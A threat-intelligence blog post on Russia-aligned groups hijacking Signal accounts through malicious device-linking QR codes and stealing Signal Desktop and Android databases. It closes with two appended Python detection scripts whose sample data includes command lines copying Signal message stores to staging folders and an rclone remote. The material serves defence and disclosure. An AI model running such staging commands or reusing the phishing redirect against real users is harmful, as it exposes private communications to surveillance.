Signals of Trouble: Multiple Russia-Aligned Threat Actors Actively Targeting Signal Messenger | Google Cloud Blog
Written by Dan Black

Google Threat Intelligence Group (GTIG) has observed increasing efforts from several Russia state-aligned threat actors to compromise Signal Messenger accounts used by individuals of interest to Russia's intelligence services. While this emerging operational interest has likely been sparked by wartime demands to gain access to sensitive government and military communications in the context of Russia's re-invasion of Ukraine, we anticipate the tactics and methods used to target Signal will grow in prevalence in the near term and proliferate to additional threat actors and regions outside the Ukrainian theater of war.

Signal's popularity among common targets of surveillance and espionage activity, such as military personnel, politicians, journalists, activists, and other at-risk communities, has positioned the secure messaging application as a high-value target for adversaries seeking to intercept sensitive information that could fulfil a range of different intelligence requirements. More broadly, this threat also extends to other popular messaging applications such as WhatsApp and Telegram, which are also being actively targeted by Russia-aligned threat groups using similar techniques. In anticipation of a wider adoption of similar tradecraft by other threat actors, we are issuing a public warning regarding the tactics and methods used to date to help build public awareness and help communities better safeguard themselves from similar threats.

We are grateful to the team at Signal for their close partnership in investigating this activity. The latest Signal releases on Android and iOS contain hardened features designed to help protect against similar phishing campaigns in the future. Update to the latest version to enable these features.

The most novel and widely used technique underpinning Russia-aligned attempts to compromise Signal accounts is the abuse of the app's legitimate "linked devices" feature, which enables Signal to be used on multiple devices concurrently. Because linking an additional device typically requires scanning a quick-response (QR) code, threat actors have resorted to crafting malicious QR codes that, when scanned, will link a victim's account to an actor-controlled Signal instance. If successful, future messages will be delivered synchronously to both the victim and the threat actor in real time, providing a persistent means to eavesdrop on the victim's secure conversations without the need for full-device compromise.

In remote phishing operations observed to date, malicious QR codes have frequently been masked as legitimate Signal resources, such as group invites, security alerts, or legitimate device-pairing instructions from the Signal website.

In more tailored remote phishing operations, malicious device-linking QR codes have been embedded in phishing pages crafted to appear as specialized applications used by the Ukrainian military.

Beyond remote phishing and malware delivery operations, we have also seen malicious QR codes being used in close-access operations. APT44 (aka Sandworm or Seashell Blizzard), a threat actor attributed by multiple governments to the Main Centre for Special Technologies (GTsST) within the Main Directorate of the General Staff of the Armed Forces of the Russian Federation (GU), known commonly as the GRU, has worked to enable forward-deployed Russian military forces to link Signal accounts on devices captured on the battlefield back to actor-controlled infrastructure for follow-on exploitation.

Notably, this device-linking concept of operations has proven to be a low-signature form of initial access due to the lack of centralized, technology-driven detections and defenses that can be used to monitor for account compromise via newly linked devices; when successful, there is a high risk that a compromise can go unnoticed for extended periods of time.

To compromise Signal accounts using the device-linking feature, one suspected Russian espionage cluster tracked as UNC5792, which partially overlaps with CERT-UA's UAC-0195, has
altered legitimate group invite pages for delivery in phishing campaigns, replacing the expected redirection to a Signal group with a redirection to a malicious URL crafted to link an actor-controlled device to the victim's Signal account.

In these operations, UNC5792 has hosted modified Signal group invitations on actor-controlled infrastructure designed to appear identical to a legitimate Signal group invite.

In each of the fake group invites, the JavaScript code that typically redirects the user to join a Signal group has been replaced by a malicious block containing the Uniform Resource Identifier (URI) used by Signal to link a new device to Signal (i.e., sgnl://linkdevice?uuid=), tricking victims into linking their Signal accounts to a device controlled by UNC5792.

Figure 1: Example modified Signal group invite hosted on the UNC5792-controlled domain signalgroupstech

Figure 2: Typical legitimate group invite code for redirection to a Signal group

Figure 3: Example of UNC5792-modified redirect code used to link the victim's device to an actor-controlled Signal instance

UNC4221, tracked by CERT-UA as UAC-0185, is an additional Russia-linked threat actor who has actively targeted Signal accounts used by Ukrainian military personnel. The group operates a tailored Signal phishing kit designed to mimic components of the Kropyva application used by the Armed Forces of Ukraine for artillery guidance. Similar to the social engineering approach used by UNC5792, UNC4221 has also attempted to mask its device-linking functionality as an invite to a Signal group from a trusted contact. Different variations of this phishing kit have been observed, including:

- Phishing websites that redirect victims to secondary phishing infrastructure masquerading as legitimate device-linking instructions provisioned by Signal (Figure 4)
- Phishing websites with the malicious device-linking QR code directly embedded into the primary Kropyva-themed phishing kit (Figure 5)

In earlier operations in 2022, UNC4221 phishing pages were crafted to
appear as a legitimate security alert from Signal (Figure 6).

Figure 4: Malicious device-linking QR code hosted on the UNC4221-controlled domain signalconfirmsite

Figure 5: UNC4221 phishing page mimicking the networking component of Kropyva, hosted at tenetaaddgroupsite. The page invites the user to "Sign in to Signal" (in Ukrainian), which in turn displays a QR code linked to an UNC4221-controlled Signal instance

Figure 6: Phishing page crafted to appear as a Signal security alert, hosted on the UNC4221-controlled domain signalprotecthost

Notably, as a core component of its Signal targeting, UNC4221 has also used a lightweight JavaScript payload tracked as PINPOINT to collect basic user information and geolocation data using the browser's Geolocation API. In general, we expect secure messages and location data to frequently feature as joint targets in future operations of this nature, particularly in the context of targeted surveillance operations or support to conventional military operations.

Beyond targeted efforts to link additional actor-controlled devices to victim Signal accounts, multiple known and established regional threat actors have also been observed operating capabilities designed to steal Signal database files from Android and Windows devices.

APT44 has been observed operating WAVESIGN, a lightweight Windows Batch script, to periodically query Signal messages from a victim's Signal database and exfiltrate the most recent messages using Rclone (Figure 7).

As reported in 2023 by the Security Service of Ukraine (SSU) and the UK's National Cyber Security Centre (NCSC), the Android malware tracked as Infamous Chisel, attributed by the respective organizations to Sandworm, is designed to recursively search for a list of file extensions, including the local database for a series of messaging applications including Signal, on Android devices.

Turla, a Russian threat actor attributed by the United States and United Kingdom to Center 16 of the Federal Security Service (FSB) of the Russian Federation, has also operated a lightweight PowerShell script in post-compromise contexts to stage Signal Desktop messages for exfiltration (Figure 8).

Extending beyond Russia, Belarus-linked UNC1151 has used the command-line utility Robocopy to stage the contents of file directories used by Signal Desktop to store messages and attachments for later exfiltration (Figure 9).

Figure 7: Code snippet from WAVESIGN used by APT44 to exfiltrate Signal messages

Figure 8: PowerShell script used by Turla to exfiltrate Signal messages

Figure 9: Robocopy command used by UNC1151 to stage Signal file directories for exfiltration

The operational emphasis on Signal from multiple threat actors in recent months serves as an important warning for the growing threat to secure messaging applications that is certain to intensify in the near term. When placed in a wider context with other trends in the threat landscape, such as the growing commercial spyware industry and the surge of mobile malware variants being leveraged in active conflict zones, there appears to be a clear and growing demand for offensive cyber capabilities that can be used to monitor the sensitive communications of individuals who rely on secure messaging applications to safeguard their online activity.

As reflected in wide-ranging efforts to compromise Signal accounts, this threat to secure messaging applications is not limited to remote cyber operations such as phishing and malware delivery, but also critically includes close-access operations where a threat actor can secure brief access to a target's unlocked device. Equally important, this threat is not only limited to Signal but also extends to other widely used messaging platforms, including WhatsApp and Telegram, which have likewise factored into the targeting priorities of several of the aforementioned Russia-aligned groups in recent months. For an example of this wider targeting interest, see Microsoft Threat Intelligence's recent blog post on a COLDRIVER, aka
UNC4057 and Star Blizzard, campaign attempting to abuse the linked device feature to compromise WhatsApp accounts.

Potential targets of government-backed intrusion activity targeting their personal devices should adopt practices to help safeguard themselves, including:

- Enable screen lock on all mobile devices using a long, complex password with a mix of uppercase and lowercase letters, numbers, and symbols. Android supports alphanumeric passwords, which offer significantly more security than numeric-only PINs or patterns.
- Install operating system updates as soon as possible and always use the latest version of Signal and other messaging apps.
- Ensure Google Play Protect is enabled, which is on by default on Android devices with Google Play Services. Google Play Protect checks your apps and devices for harmful behavior and can warn users or block apps known to exhibit malicious behavior, even when those apps come from sources outside of Play.
- Audit linked devices regularly for unauthorized devices by navigating to the "Linked devices" section in the application's settings.
- Exercise caution when interacting with QR codes and web resources purporting to be software updates, group invites, or other notifications that appear legitimate and urge immediate action.
- If available, use two-factor authentication, such as fingerprint, facial recognition, a security key, or a one-time code, to verify when your account is logged into or linked to a new device.
- iPhone users concerned about targeted surveillance or espionage activity should consider enabling Lockdown Mode to reduce their attack surface.

Check out this episode of The Defender's Advantage Podcast to hear Dan Black, Principal Analyst, Google Threat Intelligence Group, and host Luke McNamara dive deeper into this research on Russia-aligned threat actors seeking to compromise Signal Messenger.

To assist organizations hunting and identifying activity outlined in this blog post, we have included indicators of compromise (IOCs) in a GTI Collection for registered users.

See Table 1 for a sample of relevant indicators of compromise.

See Table 2 for a summary of the different tactics and techniques used by Russia and Belarus state-aligned threat actors to target Signal messages.

Table 2: Tactics and techniques used to target Signal

| Threat Actor | Tactic | Technique |
|---|---|---|
| UNC5792 | Linked device | Remote phishing operations using fake group invites to pair a victim's Signal messages to an actor-controlled device |
| UNC4221 | Linked device | Remote phishing operations using fake military web applications and security alerts to pair a victim's Signal messages to an actor-controlled device |
| APT44 | Linked device | Close-access physical device exploitation to pair a victim's Signal messages to an actor-controlled device |
| APT44 | Signal Android database theft | Android malware (Infamous Chisel) tailored to exfiltrate Signal database files |
| APT44 | Signal Desktop database theft | Windows Batch script tailored to periodically exfiltrate recent Signal messages via Rclone |
| Turla | Signal Desktop database theft | Post-compromise activity in Windows environments |
| UNC1151 | Signal Desktop database theft | Use of Robocopy to stage Signal Desktop file directories for exfiltration |
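As an added defensive check (not code from the report, from Signal, or from any of the actors described), the following Python audits a page that presents itself as a Signal group invite and flags the swap described in the UNC5792 section above: a device-linking URI where a group link should be. It assumes a legitimate invite redirect resolves to a signal.group/# link and that sgnl://linkdevice?uuid= (as given on the page) is the device-linking form; the sample pages and the uuid value are constructed placeholders.

```python
import re
from dataclasses import dataclass

# Any Signal deep link (sgnl://) or web URL found in the page's markup or script.
URI_RE = re.compile(r"(?:sgnl|https?)://[^\s'\"<>]+", re.IGNORECASE)


@dataclass
class Finding:
    uri: str
    verdict: str  # "invite", "link-device" or "other"


def classify_uri(uri: str) -> str:
    """Assumed URI shapes: a group invite resolves to .../signal.group/#...,
    while the device-linking deep link uses the linkdevice host
    (sgnl://linkdevice?uuid=...). A group invite page has no reason to
    carry the latter, so its presence is the signal of interest."""
    lowered = uri.lower()
    if lowered.startswith("sgnl://linkdevice"):
        return "link-device"
    if "signal.group/#" in lowered:
        return "invite"
    return "other"


def audit_invite_page(html: str) -> list[Finding]:
    """Extract every URI from a page claiming to be a group invite and classify it."""
    return [Finding(u, classify_uri(u)) for u in URI_RE.findall(html)]


def is_swapped_invite(html: str) -> bool:
    """True when a page presented as a group invite would hand the Signal app a
    device-linking URI instead of (or as well as) a group link."""
    return any(f.verdict == "link-device" for f in audit_invite_page(html))


# Constructed samples, not captured pages: a benign invite redirect and one
# whose redirect target was replaced with a device-linking URI (placeholder uuid).
BENIGN_INVITE = """<script>
  window.location.href = "sgnl://signal.group/#CjQKIEXAMPLEINVITECODE";
</script>"""
SWAPPED_INVITE = """<script>
  window.location.href = "sgnl://linkdevice?uuid=PLACEHOLDER-UUID";
</script>"""

if __name__ == "__main__":
    for name, page in (("benign", BENIGN_INVITE), ("swapped", SWAPPED_INVITE)):
        print(name, "suspicious" if is_swapped_invite(page) else "clean",
              [f.verdict for f in audit_invite_page(page)])
```

The same classification can be applied to the target of any QR code a user is about to scan: a "group invite" that decodes to a linkdevice URI is the pattern the report describes.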
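As an added hunting example (not WAVESIGN, the Turla PowerShell script, or any code from the report), this Python pass flags process-creation records where a copy or sync tool references Signal Desktop's data directory, the staging-for-exfiltration pattern attributed above to APT44, Turla, and UNC1151. It assumes Signal Desktop keeps its Windows data under %APPDATA%\Signal (message store in sql\db.sqlite, attachments in attachments.noindex) and uses a constructed host|image|command-line log format.

```python
import re
from typing import NamedTuple

# Assumed Signal Desktop data locations on Windows: %APPDATA%\Signal, with the
# message store in sql\db.sqlite and attachments under attachments.noindex.
SIGNAL_DATA_RE = re.compile(
    r"\\signal\\sql\\db\.sqlite|\\signal\\attachments\.noindex|\\appdata\\roaming\\signal\b",
    re.IGNORECASE,
)
# Copy/sync tooling the report associates with staging and exfiltration
# (Robocopy, Rclone, PowerShell), plus generic copy helpers.
STAGING_TOOLS = {"robocopy.exe", "rclone.exe", "xcopy.exe", "powershell.exe", "cmd.exe"}


class ProcEvent(NamedTuple):
    host: str
    image: str      # full path of the executable, lower-cased
    cmdline: str


def parse_line(line: str) -> ProcEvent:
    """Constructed log format: host|image path|command line."""
    host, image, cmdline = line.split("|", 2)
    return ProcEvent(host.strip(), image.strip().lower(), cmdline.strip())


def is_signal_staging(ev: ProcEvent) -> bool:
    """Flag copy/sync tools whose command line touches Signal Desktop data."""
    tool = ev.image.rsplit("\\", 1)[-1]
    return tool in STAGING_TOOLS and SIGNAL_DATA_RE.search(ev.cmdline) is not None


def hunt(lines: list[str]) -> list[ProcEvent]:
    """Return only the records that match the staging pattern."""
    return [ev for ev in map(parse_line, lines) if is_signal_staging(ev)]


# Constructed process-creation records, not real telemetry.
SAMPLE_LOG = [
    r'WS01|C:\Windows\System32\Robocopy.exe|robocopy "C:\Users\a\AppData\Roaming\Signal" C:\Users\Public\stage /E /R:0',
    r'WS01|C:\Windows\System32\Robocopy.exe|robocopy C:\Projects\site D:\backup\site /E',
    r'WS02|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -c "Copy-Item $env:APPDATA\Signal\sql\db.sqlite C:\temp\s.db"',
    r'WS03|C:\tools\rclone.exe|rclone copy "C:\Users\b\AppData\Roaming\Signal\attachments.noindex" remote:bk',
    r'WS03|C:\Program Files\Signal\Signal.exe|"C:\Program Files\Signal\Signal.exe"',
]

if __name__ == "__main__":
    for ev in hunt(SAMPLE_LOG):
        print(f"{ev.host}: {ev.image} -> {ev.cmdline}")
```

Signal Desktop itself opening its own database is deliberately not matched, which keeps the rule focused on third-party tools reading the store.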